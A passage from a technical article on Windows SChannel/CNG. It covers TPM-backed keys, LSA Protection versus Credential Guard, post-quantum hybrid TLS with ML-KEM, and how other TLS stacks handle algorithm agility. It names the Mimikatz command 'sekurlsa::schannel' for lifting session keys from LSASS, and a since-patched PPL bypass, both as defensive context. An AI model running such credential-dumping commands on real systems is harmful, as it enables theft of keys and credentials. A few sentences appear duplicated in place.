&lt;p&gt;The Microsoft Platform Crypto Provider (PCP) is a KSP that stores private keys non-exportable inside TPM 2.0. For an IIS or &lt;code&gt;SslStream&lt;/code&gt; server, switching to a PCP-backed certificate means the certificate&apos;s private key never resides in software memory; CertificateVerify signing during the handshake dispatches through &lt;code&gt;NCryptSignHash&lt;/code&gt; to PCP to &lt;code&gt;TPM2_Sign&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Two caveats need stating plainly. First, PCP-backed key operations are slower than software-backed key operations -- TPM 2.0 ECDSA / RSA signing latency is in the tens of milliseconds, which is a hard cap on handshake throughput. A high-volume edge IIS workload cannot meet its handshake-rate SLA with TPM-backed keys. Second, &lt;strong&gt;production prevalence of PCP-backed server keys remains low outside specific compliance scenarios&lt;/strong&gt;. The capability is shipping; the typical pattern is software-backed keys at the edge and TPM-backed keys for long-lived service-identity certificates where the latency does not dominate.TPM 2.0 signing latency is the ceiling for TPM-backed TLS handshake throughput. A high-volume IIS edge cannot meet handshake-rate SLAs with TPM-backed keys; that is why the typical pattern is software-backed keys at the edge and TPM-backed keys for service identity at lower call rates.&lt;/p&gt;
&lt;h3&gt;LSA Protection (RunAsPPL) and Credential Guard&lt;/h3&gt;

A Windows process-protection lattice where a &quot;protected&quot; process can be opened for certain rights only by callers whose protection level is greater than or equal to the target&apos;s. When LSASS runs as a PPL (via `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL`), a non-PPL caller&apos;s `OpenProcess(LSASS, PROCESS_VM_READ, ...)` returns `ERROR_ACCESS_DENIED`. PPL is a same-privilege gate: it operates entirely inside Virtual Trust Level 0 (VTL0), the normal kernel/user world [@ms-learn-lsa-protection][@itm4n-runasppl].
&lt;p&gt;LSASS holds the cleartext session keys SChannel derives for each active TLS connection. Historically Mimikatz&apos;s &lt;code&gt;sekurlsa::schannel&lt;/code&gt; command read those keys directly out of LSASS memory after a debug-privilege &lt;code&gt;OpenProcess&lt;/code&gt;. Once RunAsPPL is enforced, the read fails: a non-PPL Mimikatz cannot open LSASS for memory read [@ms-learn-lsa-protection].&lt;/p&gt;
&lt;p&gt;Clément Labro&apos;s RunAsPPL analysis (&lt;code&gt;itm4n&lt;/code&gt;) is the canonical practitioner&apos;s text on the gotchas [@itm4n-runasppl]. The single most important framing point Labro makes is the disambiguation between PPL and Credential Guard:&lt;/p&gt;

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement... Credential Guard and LSA Protection are actually complementary. -- Clément Labro, *Do You Really Know About LSA Protection (RunAsPPL)?* [@itm4n-runasppl]
&lt;p&gt;The disambiguation matters because the two mechanisms operate at different layers. &lt;strong&gt;PPL is a same-privilege gate inside VTL0.&lt;/strong&gt; &lt;strong&gt;Credential Guard moves credential material into the LSAIso trustlet at VTL1&lt;/strong&gt;, behind the VBS / Hyper-V boundary -- a cross-privilege isolation that PPL cannot provide [@ms-learn-credential-guard]. The misconception that Credential Guard alone defeats &lt;code&gt;mimikatz sekurlsa::schannel&lt;/code&gt; is one of the most common operator errors in this space. They stack. They are not substitutes.&lt;/p&gt;

flowchart TB
    subgraph VTL0[&quot;VTL0 -- Normal World&quot;]
        subgraph User[&quot;User mode&quot;]
            App[&quot;Mimikatz / arbitrary code -- non-PPL&quot;]
        end
        subgraph Kern[&quot;Kernel mode (NT kernel)&quot;]
            LSASS[&quot;LSASS -- PPL when RunAsPPL=1&quot;]
            SCh[schannel.dll loaded in LSASS]
        end
    end
    subgraph VTL1[&quot;VTL1 -- Isolated User Mode (VBS)&quot;]
        LSAIso[&quot;LSAIso trustlet -- Credential Guard&quot;]
    end
    App -. &quot;OpenProcess(LSASS, VM_READ) -- denied when PPL on&quot; .-&amp;gt; LSASS
    LSASS -. &quot;RPC to LSAIso for credential ops&quot; .-&amp;gt; LSAIso
    SCh --&amp;gt; LSASS
&lt;p&gt;The last open question on RunAsPPL is whether the protection itself is bypassable. The honest answer is &quot;less so than it used to be.&quot; Labro&apos;s follow-up &quot;The End of PPLdump&quot; walks through how a 2021-era SymLink + KnownDlls trick that defeated PPL was patched, and how the post-patch PPL invariant holds for current Windows servicing branches [@itm4n-ppldump]. Combined with HVCI and VBS-on-by-default in newer Windows 11 builds, the modern SChannel session key is genuinely harder to lift than it was in 2019.&lt;/p&gt;

Operators frequently set `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1` and stop there. Microsoft&apos;s Configure-Added-LSA-Protection doc walks through the additional values (`RunAsPPLBoot` for the boot-level enforcement, the corresponding UEFI variable for tamper resistance) that complete the posture [@ms-learn-lsa-protection]. The minimum recommended configuration is not a single value in a single hive; reading the official doc end to end is faster than rediscovering this from a bug report.
&lt;p&gt;Modern SChannel is the substrate plus the trust pipeline plus the CredSSP RDP wrapper plus the LSASS moat. The one piece still in flight as of mid-2026 is the cryptographic primitive nobody had in 2009 -- the post-quantum hybrid key exchange.&lt;/p&gt;
&lt;h2&gt;9. The Post-Quantum Pivot: ML-KEM, SymCrypt, and Hybrid TLS 1.3&lt;/h2&gt;
&lt;p&gt;On August 13, 2024, NIST published &lt;strong&gt;FIPS 203&lt;/strong&gt; -- the standard for ML-KEM, the first quantum-resistant key-encapsulation mechanism the United States government endorses for production use [@fips-203]. The standard defines three parameter sets (ML-KEM-512, ML-KEM-768, ML-KEM-1024) with security grounded in the Module Learning With Errors problem. The SymCrypt CHANGELOG entry for v103.5.0 reads, verbatim: &quot;Add ML-KEM per final FIPS 203&quot; [@symcrypt-changelog]. That single line is what the receipts on Microsoft&apos;s twenty-year algorithm-agility bet look like in the present tense.&lt;/p&gt;

A **KEM** is a public-key construction that, given a recipient&apos;s public key, produces a (ciphertext, shared-secret) pair such that the recipient can recover the shared secret from the ciphertext using its private key. ML-KEM is the NIST-standardised KEM derived from the CRYSTALS-Kyber proposal; ML-KEM-768 generates a 1184-byte public key and a 1088-byte ciphertext and produces a 32-byte shared secret. FIPS 203 [@fips-203] is the final standard; SymCrypt v103.5.0 is the first SymCrypt release shipping ML-KEM per that standard [@symcrypt-changelog].
&lt;h3&gt;What is shipping&lt;/h3&gt;
&lt;p&gt;The PQC primitives Microsoft has rolled into SymCrypt are publicly tracked in the project CHANGELOG [@symcrypt-changelog]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;v103.5.0&lt;/strong&gt; -- ML-KEM (FIPS 203) [@fips-203].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v103.6.0&lt;/strong&gt; -- LMS (NIST SP 800-208 stateful hash-based signature) and AES-KW(P).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v103.7.0&lt;/strong&gt; -- ML-DSA (FIPS 204) [@fips-204].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v103.11.0&lt;/strong&gt; -- Composite ML-KEM (hybrid ML-KEM with a classical KEM).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v103.12.0&lt;/strong&gt; -- Composite ML-DSA (hybrid ML-DSA with a classical signature scheme).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;v103.12.1&lt;/strong&gt; -- AVX-512 AES-GCM (up to ~35% throughput improvement).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CNG exposes the matching &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt; with parameter-set selectors -- &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_768&lt;/code&gt;, &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_1024&lt;/code&gt;, and so on [@ms-learn-cng-mlkem-examples]. The Microsoft Learn page for the CNG ML-KEM API surface carries an explicit &quot;prerelease product / Windows Insider Preview&quot; banner. The article therefore frames SChannel&apos;s PQC support as &lt;strong&gt;preview / Insider-channel as of mid-2026&lt;/strong&gt;, with broader GA rollout in flight; the Microsoft Tech Community PQC announcement (December 2024) is the narrative anchor and the Insider-Preview banner on the API doc is the technical hedge [@ms-tech-community-pqc][@ms-tech-community-pqc-companion].&lt;/p&gt;
&lt;p&gt;The hash-based and stateless-hash-based signature side of PQC (SLH-DSA, FIPS 205 [@fips-205]) is shipping in SymCrypt and CNG along the same trajectory. Section 11 returns to why the &lt;em&gt;signature&lt;/em&gt;-side PQC transition is harder than the &lt;em&gt;KEM&lt;/em&gt;-side transition.&lt;/p&gt;
&lt;h3&gt;Hybrid TLS 1.3 key exchange: &lt;code&gt;X25519MLKEM768&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The IETF-converged named group for the most-deployed hybrid is &lt;code&gt;X25519MLKEM768&lt;/code&gt;, defined in &lt;code&gt;draft-ietf-tls-ecdhe-mlkem&lt;/code&gt; (Kris Kwiatkowski / PQShield, Panos Kampanakis / AWS, Bas Westerbaan / Cloudflare, Douglas Stebila / University of Waterloo; currently -05 as of May 26, 2026) [@draft-ietf-tls-ecdhe-mlkem]. The draft also defines &lt;code&gt;SecP256r1MLKEM768&lt;/code&gt; and &lt;code&gt;SecP384r1MLKEM1024&lt;/code&gt; for deployments that prefer NIST curves over X25519.&lt;/p&gt;
&lt;p&gt;The handshake mechanics are clean. The client sends &lt;code&gt;mlkem_pk || x25519_pk&lt;/code&gt; (1184 + 32 = 1216 bytes) in its &lt;code&gt;key_share&lt;/code&gt;; the server responds with &lt;code&gt;mlkem_ct || x25519_pk&lt;/code&gt; (1088 + 32 = 1120 bytes); both sides compute &lt;code&gt;shared_secret = mlkem_ss || x25519_ss&lt;/code&gt; (32 + 32 = 64 bytes) and feed that into TLS 1.3&apos;s HKDF-Extract as &lt;code&gt;IKM&lt;/code&gt;.&lt;/p&gt;

sequenceDiagram
    participant Client
    participant Server&lt;pre&gt;&lt;code&gt;Note over Client: Generate X25519 keypair and ML-KEM-768 keypair
Client-&amp;gt;&amp;gt;Server: ClientHello with key_share (mlkem_pk concatenated with x25519_pk -- 1216 B)
Note over Server: Generate X25519 keypair, ML-KEM encapsulate to client mlkem_pk
Server-&amp;gt;&amp;gt;Client: ServerHello with key_share (mlkem_ct concatenated with x25519_pk -- 1120 B)
Note over Client: X25519 DH, ML-KEM decapsulate
Note over Client,Server: shared_secret -- mlkem_ss concatenated with x25519_ss (64 B)
Note over Client,Server: HKDF-Extract over shared_secret continues TLS 1.3 key schedule
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The construction is &lt;strong&gt;defence-in-depth against either a classical-only break or a quantum-only break&lt;/strong&gt;: an adversary must defeat &lt;em&gt;both&lt;/em&gt; X25519 and ML-KEM-768 to recover the session key, and the hybrid analysis (Bindel et al., PQCrypto 2019) shows the construction is at least as secure as the stronger of the two components. The minor cost is the inflated &lt;code&gt;ClientHello&lt;/code&gt; and &lt;code&gt;ServerHello&lt;/code&gt; (about 1.2 KB extra) and a couple of milliseconds of ML-KEM operations.&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode for the X25519MLKEM768 shared-secret concatenation.
// In real SChannel: BCryptSecretAgreement(BCRYPT_ECDH_P256_ALGORITHM_HANDLE / X25519, ...)
//                 + BCryptDecapsulate(BCRYPT_MLKEM_ALG_HANDLE, parameter_set = 768, ...)&lt;/p&gt;
&lt;p&gt;function x25519_dh(privA, pubB)          { return new Uint8Array(32).fill(0xAA); }  // 32 B
function mlkem768_decaps(privA, ct)      { return new Uint8Array(32).fill(0xBB); }  // 32 B&lt;/p&gt;
&lt;p&gt;const x25519_ss = x25519_dh(&apos;clientX25519Priv&apos;, &apos;serverX25519Pub&apos;);
const mlkem_ss  = mlkem768_decaps(&apos;clientMLKEMPriv&apos;, &apos;serverMLKEMCt&apos;);&lt;/p&gt;
&lt;p&gt;const hybrid_secret = new Uint8Array(64);
hybrid_secret.set(mlkem_ss, 0);
hybrid_secret.set(x25519_ss, 32);&lt;/p&gt;
&lt;p&gt;console.log(&apos;IKM length for HKDF-Extract:&apos;, hybrid_secret.length, &apos;bytes&apos;);
console.log(&apos;First byte: 0x&apos; + hybrid_secret[0].toString(16),
            &apos;(from ML-KEM half, defends against quantum break)&apos;);
console.log(&apos;Byte 32: 0x&apos; + hybrid_secret[32].toString(16),
            &apos;(from X25519 half, defends against classical break)&apos;);
`}&lt;/p&gt;
&lt;h3&gt;The agility payoff&lt;/h3&gt;
&lt;p&gt;This rotation is the cleanest demonstration of Section 4&apos;s thesis. Adding &lt;code&gt;X25519MLKEM768&lt;/code&gt; to SChannel required: (a) a SymCrypt primitive (v103.5.0+ for ML-KEM, with X25519 long present per RFC 7748 [@rfc-7748]); (b) a new BCrypt provider registration (&lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt; and the hybrid named-group plumbing); (c) a new SChannel named-group entry. No IIS source change. No SQL Server source change. No &lt;code&gt;SslStream&lt;/code&gt; source change. Eighteen years after Vista shipped CNG, the substrate is producing receipts for a brand-new algorithm family.&lt;/p&gt;
&lt;p&gt;The deployment side is moving faster than most ten-year forecasts in cryptography ever predicted. Cloudflare&apos;s measurements (March 2024) put PQC-secured TLS 1.3 connections at &quot;nearly two percent&quot; of inbound, with the team forecasting double-digit percentages by end of 2024 [@cloudflare-pq-2024]. Cloudflare&apos;s origin-side PQC rollout has been live since September 2023 [@cloudflare-pq-origins]. Chrome / BoringSSL, Edge (via BoringSSL), and Firefox / NSS ship &lt;code&gt;X25519MLKEM768&lt;/code&gt; client-side. OpenSSL 3.5 ships ML-KEM. Server-side SChannel adoption is rolling through the Insider channel and the official Tech Community posts as of mid-2026 [@ms-learn-cng-mlkem-examples][@ms-tech-community-pqc-companion].Cloudflare&apos;s measurements (March 2024) put PQC-secured TLS 1.3 connections at &quot;nearly two percent&quot; of their inbound; by the end of 2024 they expected double-digit percentages [@cloudflare-pq-2024]. The transition is moving faster than most ten-year forecasts in cryptography ever predicted.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The hybrid PQC handshake is cheap in absolute terms but the cost is not uniform across deployment shapes. On a typical Server 2022 IIS edge with software-backed RSA-2048 plus AES-NI, sustained handshake rates run in the &lt;strong&gt;thousands per second per core&lt;/strong&gt;; the X25519MLKEM768 hybrid adds roughly &lt;strong&gt;5-10 ms of handshake latency&lt;/strong&gt;, which is in the noise relative to the per-handshake cost of an RSA-2048 signature. On a TPM-key-bound edge the picture inverts: the Microsoft Platform Crypto Provider is serialised by TPM 2.0 &lt;code&gt;TPM2_Sign&lt;/code&gt; latency (tens of milliseconds per signature), so sustained handshake rates sit in the &lt;strong&gt;tens to roughly one hundred handshakes per second per host&lt;/strong&gt;, and the same ~5-10 ms hybrid delta becomes a non-trivial fraction of the per-handshake budget. AES-NI bulk throughput on AES-256-GCM is roughly &lt;strong&gt;5-10 Gbps per core&lt;/strong&gt; (the AVX-512 AES-GCM landing in SymCrypt v103.12.1 shifts that ceiling further [@symcrypt-changelog]) so the post-handshake data path is not the bottleneck. Operator decision support: if you are software-key-bound, the hybrid PQC delta is noise. If you are TPM-key-bound, your handshake rate is already in the tens, and the hybrid delta is meaningful enough to budget for.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; As of article publication (mid-2026), SChannel&apos;s &lt;code&gt;X25519MLKEM768&lt;/code&gt; support is preview / Insider-channel; the CNG ML-KEM page carries the explicit Windows Insider Preview banner [@ms-learn-cng-mlkem-examples]. Track the SymCrypt CHANGELOG for primitive landings [@symcrypt-changelog] and the Microsoft Tech Community PQC posts for OS-channel GA announcements [@ms-tech-community-pqc]. Do not assert GA dates that have not landed.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the PQC rotation is the agility payoff, the next question is the obvious one: how does SChannel&apos;s answer compare to the other TLS stacks shipping on the same calendar? OpenSSL, BoringSSL, NSS, and Apple&apos;s Network framework have all had to solve the same algorithm-agility problem -- and they have all made different trade-offs.&lt;/p&gt;
&lt;h2&gt;10. Competing Approaches: How Other TLS Stacks Solve Algorithm Agility&lt;/h2&gt;
&lt;p&gt;Algorithm agility is not a property of TLS-the-protocol. It is a property of the &lt;em&gt;substrate&lt;/em&gt; underneath the protocol. Every major TLS implementation has had to answer the same question -- &quot;how do we add a new primitive without breaking our consumers?&quot; -- and the answers are surprisingly different.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Stack&lt;/th&gt;
&lt;th&gt;Substrate model&lt;/th&gt;
&lt;th&gt;Stability commitment&lt;/th&gt;
&lt;th&gt;PQC integration as of mid-2026&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SChannel / CNG&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;BCrypt providers + NCrypt KSPs; Win32 API-stable [@ms-learn-cng-portal]&lt;/td&gt;
&lt;td&gt;Strong: Win32 SSPI surface frozen&lt;/td&gt;
&lt;td&gt;ML-KEM in SymCrypt v103.5.0 [@symcrypt-changelog]; &lt;code&gt;X25519MLKEM768&lt;/code&gt; Insider Preview [@ms-learn-cng-mlkem-examples]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OpenSSL 3.x&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OSSL_PROVIDER&lt;/code&gt; modules via &lt;code&gt;OSSL_DISPATCH&lt;/code&gt; arrays [@openssl-provider7-3.0]&lt;/td&gt;
&lt;td&gt;Strong-by-major-version&lt;/td&gt;
&lt;td&gt;OQS-Provider for early PQC; ML-KEM in OpenSSL 3.5&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;BoringSSL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Single source tree; &quot;rolling release&quot;; no provider model [@boringssl-readme]&lt;/td&gt;
&lt;td&gt;Explicitly none (&quot;no guarantees of API or ABI stability&quot;)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;X25519MLKEM768&lt;/code&gt; shipping; consumer vendoring required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NSS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OASIS PKCS #11 v3.1 modules via &lt;code&gt;CK_FUNCTION_LIST&lt;/code&gt; [@nss-3.111-release-notes][@oasis-pkcs11-v3.1]&lt;/td&gt;
&lt;td&gt;Strong (Firefox compatibility)&lt;/td&gt;
&lt;td&gt;ML-KEM via PKCS #11 v3.1 &lt;code&gt;C_Encapsulate&lt;/code&gt; / &lt;code&gt;C_Decapsulate&lt;/code&gt;; &lt;code&gt;X25519MLKEM768&lt;/code&gt; in Firefox 132&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Apple Network framework / Secure Transport&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Framework-version pinning per OS release [@apple-network-framework][@apple-secure-transport]&lt;/td&gt;
&lt;td&gt;Strong per OS version&lt;/td&gt;
&lt;td&gt;Hybrid KEM shipping in newer Network framework releases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;.NET &lt;code&gt;SslStream&lt;/code&gt; cross-platform&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Delegates to host OS stack [@dotnet-cross-platform-crypto]&lt;/td&gt;
&lt;td&gt;Strong per .NET version&lt;/td&gt;
&lt;td&gt;Inherits underlying stack&apos;s PQC support&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;OpenSSL 3.x: &lt;code&gt;OSSL_PROVIDER&lt;/code&gt;, explicit contexts, three in-tree providers&lt;/h3&gt;
&lt;p&gt;OpenSSL 3.0 replaced the older &lt;code&gt;ENGINE&lt;/code&gt; model with the &lt;strong&gt;&lt;code&gt;OSSL_PROVIDER&lt;/code&gt;&lt;/strong&gt; system, described in the &lt;code&gt;provider(7)&lt;/code&gt; manpage as &quot;a unit of code that provides one or more implementations for various operations for diverse algorithms&quot; [@openssl-provider7-3.0]. A provider exposes its operations through an &lt;code&gt;OSSL_DISPATCH&lt;/code&gt; array of &lt;code&gt;{function-id, function-pointer}&lt;/code&gt; pairs. The loader&apos;s entry point is a single exported function with this exact signature [@openssl-provider7-3.0]:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;int OSSL_provider_init(const OSSL_CORE_HANDLE *handle,
                       const OSSL_DISPATCH *in,
                       const OSSL_DISPATCH **out,
                       void **provctx);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;in&lt;/code&gt; array gives the provider the callbacks the OpenSSL library is willing to provide to the provider (logging, error reporting, library-context queries, parameter accessors) [@openssl-provider-base7-3.0]; the &lt;code&gt;out&lt;/code&gt; array is filled in by the provider with the operations it implements. The &lt;code&gt;provctx&lt;/code&gt; is the provider&apos;s own per-instance state.&lt;/p&gt;
&lt;p&gt;OpenSSL 3.0 ships three in-tree providers: &lt;strong&gt;default&lt;/strong&gt; (the modern algorithm set), &lt;strong&gt;legacy&lt;/strong&gt; (RC4, MD4, IDEA, and other backward-compatibility primitives), and &lt;strong&gt;FIPS&lt;/strong&gt; (the FIPS 140-3-validated subset). Out-of-tree, the OQS-Provider plugs PQC primitives into OpenSSL without recompiling the OpenSSL build itself. The substantive contrast with CNG: OpenSSL makes the provider context an &lt;em&gt;explicit&lt;/em&gt; parameter via &lt;code&gt;OSSL_LIB_CTX *&lt;/code&gt;, which means multiple isolated provider sets can coexist inside one process (a FIPS-validated workload and a legacy workload in the same binary). CNG keeps provider dispatch global per-process. Both models are functionally agile; OpenSSL&apos;s is more &lt;em&gt;compositional&lt;/em&gt; at runtime, while CNG&apos;s is more &lt;em&gt;governed&lt;/em&gt; through the Windows servicing branch.&lt;/p&gt;
&lt;h3&gt;BoringSSL&apos;s anti-agility position&lt;/h3&gt;
&lt;p&gt;BoringSSL is Google&apos;s TLS stack used by Chromium and (via Chromium) Microsoft Edge. The project README says, verbatim:&lt;/p&gt;

Although BoringSSL is an open source project, it is not intended for general use, as OpenSSL is. We don&apos;t recommend that third parties depend upon it. Doing so is likely to be frustrating because there are no guarantees of API or ABI stability. -- BoringSSL README [@boringssl-readme]
&lt;p&gt;BoringSSL achieves agility by &lt;em&gt;refusing&lt;/em&gt; to absorb it as a public API. Consumers vendor BoringSSL into their own build tree and accept the lift of tracking head. Chromium does this; Edge inherits it; cURL ships configurations that link against BoringSSL when the consumer asks for it. The model is the inverse of CNG&apos;s: maximum velocity for the maintainer, maximum churn for the consumer. For a vendor whose chief constraint is API stability for the Win32 / .NET universe, BoringSSL&apos;s model is structurally incompatible. For a vendor whose chief constraint is shipping the modern internet&apos;s TLS posture into a browser monthly, BoringSSL&apos;s model is the right answer.&lt;/p&gt;
&lt;h3&gt;NSS and PKCS #11&lt;/h3&gt;
&lt;p&gt;Mozilla&apos;s NSS predates almost every other stack here and uses the &lt;strong&gt;OASIS PKCS #11&lt;/strong&gt; (Cryptoki) module standard as its agility hinge [@oasis-pkcs11-v3.1]. A PKCS #11 module exposes a single entry point, &lt;code&gt;C_GetFunctionList(CK_FUNCTION_LIST_PTR_PTR ppFunctionList)&lt;/code&gt;, which returns a table of roughly seventy function pointers. Those functions are organised around a three-level hierarchy: a &lt;em&gt;slot&lt;/em&gt; is a place where a &lt;em&gt;token&lt;/em&gt; sits; a &lt;em&gt;token&lt;/em&gt; holds &lt;em&gt;objects&lt;/em&gt; (keys, certificates, data); cryptographic operations are invoked against an object referenced by &lt;code&gt;CK_OBJECT_HANDLE&lt;/code&gt; and parametrised by a &lt;code&gt;CK_MECHANISM&lt;/code&gt; (e.g. &lt;code&gt;CKM_AES_GCM&lt;/code&gt;, &lt;code&gt;CKM_ECDH1_DERIVE&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;NSS itself ships two PKCS #11 modules out of the box: the &lt;strong&gt;NSS softoken&lt;/strong&gt; (&lt;code&gt;softokn3&lt;/code&gt;, in-process software primitives) and the &lt;strong&gt;NSS FIPS softoken&lt;/strong&gt; (the FIPS-validated variant). Hardware PKCS #11 modules for HSMs and smart cards load through the same &lt;code&gt;SECMOD_LoadUserModule&lt;/code&gt; API. PQC arrived in NSS via PKCS #11 v3.1&apos;s KEM operations: &lt;code&gt;C_Encapsulate&lt;/code&gt; and &lt;code&gt;C_Decapsulate&lt;/code&gt; are standardised verbs that ML-KEM-768 implementations can expose without needing the historic &lt;code&gt;CKM_VENDOR_DEFINED&lt;/code&gt; mechanism-ID reservation pattern. NSS 3.111 (released April 28, 2025) is the release marker for full PKCS #11 v3.1 adoption in NSS [@nss-3.111-release-notes]; Firefox shipped &lt;code&gt;X25519MLKEM768&lt;/code&gt; client-side in Firefox 132 (October 2024). The high-order contrast with CNG: PKCS #11 is a &lt;em&gt;cross-vendor industry standard&lt;/em&gt;, so the same NSS / Firefox runtime can talk to a Mozilla softoken, an HSM module, and a smart-card module through a single interface; CNG is single-vendor (Microsoft) but exposes a fully Microsoft-curated provider universe through a stable Win32 API.&lt;/p&gt;
&lt;h3&gt;Apple Network framework and CryptoKit&lt;/h3&gt;
&lt;p&gt;Apple&apos;s TLS-stack history splits into the deprecated &lt;strong&gt;Secure Transport&lt;/strong&gt; API [@apple-secure-transport] and the modern &lt;strong&gt;Network framework&lt;/strong&gt; introduced in macOS 10.14 and iOS 12 [@apple-network-framework]. Secure Transport&apos;s design was C-API and typed-enum: &lt;code&gt;SSLProtocol&lt;/code&gt; selected the TLS version; &lt;code&gt;SSLCipherSuite&lt;/code&gt; integers were the IANA cipher-suite codepoints; the developer worked with &lt;code&gt;SSLContextRef&lt;/code&gt; handles much as a Windows developer works with &lt;code&gt;CtxtHandle&lt;/code&gt;. The agility model was &lt;em&gt;named-enum-per-OS-release&lt;/em&gt;: every TLS version and cipher was a compile-time constant, and the SDK version the application was built against determined what was selectable.&lt;/p&gt;
&lt;p&gt;Network framework moved the API to a Swift-first surface (&lt;code&gt;NWProtocolTLS.Options&lt;/code&gt;, &lt;code&gt;sec_protocol_options_set_min_tls_protocol_version&lt;/code&gt;) and started Apple&apos;s deprecation glide for Secure Transport. On top of the network-layer primitives, &lt;strong&gt;CryptoKit&lt;/strong&gt; (iOS 13 / macOS 10.15) provides the Swift-idiomatic high-level crypto API for symmetric AEAD, ECDH, ECDSA, and (via subsequent OS releases) the post-quantum primitives [@apple-cryptokit]. The cadence is bound to Apple&apos;s annual OS release: a new algorithm becomes available when the OS that ships it becomes available, and applications that need it bump their minimum-deployment target.&lt;/p&gt;
&lt;p&gt;The structural contrast with CNG: Apple&apos;s model gives the platform vendor very tight control over what is selectable and a clean deprecation path (you simply drop a constant from a future SDK), but the cost is that &lt;em&gt;the application&apos;s algorithm options track the OS version the application is built for&lt;/em&gt;. CNG decouples those -- a Windows 11 application built against a 2015 Win32 SDK still sees new BCrypt algorithm strings as the OS ships them, because the dispatch is by string at runtime.&lt;/p&gt;
&lt;h3&gt;.NET &lt;code&gt;SslStream&lt;/code&gt; -- one API, three host backends&lt;/h3&gt;
&lt;p&gt;.NET&apos;s &lt;code&gt;System.Net.Security.SslStream&lt;/code&gt; is &lt;em&gt;identical&lt;/em&gt; on every host. The implementation, however, delegates to the host operating system&apos;s TLS stack. On Windows it calls into SChannel through SSPI; on Linux it calls into OpenSSL via &lt;code&gt;System.Security.Cryptography.Native.OpenSsl&lt;/code&gt;; on macOS it calls into Apple&apos;s Network framework via &lt;code&gt;System.Security.Cryptography.Native.Apple&lt;/code&gt; [@dotnet-cross-platform-crypto]. There is no &quot;pick a backend&quot; knob in &lt;code&gt;SslStream&lt;/code&gt;; the runtime picks whichever backend the host OS provides.&lt;/p&gt;
&lt;p&gt;The agility consequence for PQC is direct. A &lt;code&gt;.NET 10&lt;/code&gt; application running on a Windows Insider build whose SChannel has &lt;code&gt;X25519MLKEM768&lt;/code&gt; enabled by default will negotiate hybrid PQC automatically. The same application running on macOS gets classical X25519 until Apple ships hybrid in Network framework. The same application running on Linux against OpenSSL 3.5 gets ML-KEM via OpenSSL&apos;s in-tree implementation. &lt;strong&gt;The application source code never changes; the wire-level cryptography is whatever the host&apos;s TLS stack negotiates.&lt;/strong&gt; This is the agility property in cross-platform clothing -- and it works because each host&apos;s substrate is itself agile.&lt;/p&gt;
&lt;h3&gt;Five substrates, five answers&lt;/h3&gt;
&lt;p&gt;The cross-stack comparison surfaces the meta-point. Five substrates: CNG, OpenSSL &lt;code&gt;OSSL_PROVIDER&lt;/code&gt;, BoringSSL&apos;s vendored tree, PKCS #11, Apple&apos;s named-enum SDK. Five answers, all functional, all optimising for different deployment models. SChannel / CNG is the most &lt;em&gt;registry-driven and single-vendor-extensible&lt;/em&gt;; OpenSSL is the most &lt;em&gt;context-explicit&lt;/em&gt;; PKCS #11 is the most &lt;em&gt;cross-vendor-standardised&lt;/em&gt;; BoringSSL is the most &lt;em&gt;aggressive-by-refusing-stability&lt;/em&gt;; Apple is the most &lt;em&gt;named-enum-SDK-bound&lt;/em&gt;. None of these is &quot;the right&quot; answer -- each is the answer that fits its vendor&apos;s deployment shape. The agility property is &lt;em&gt;of the substrate&lt;/em&gt;, and the right substrate depends on what you ship and to whom.&lt;/p&gt;
&lt;p&gt;Agility is the &lt;em&gt;capacity&lt;/em&gt; for rotation. Whether the rotation actually happens is a separate problem -- one that the empirical evidence of TLS 1.0 / 1.1&apos;s 25-year tail tells a sobering story about.&lt;/p&gt;
&lt;h2&gt;11. Limits and Open Problems&lt;/h2&gt;
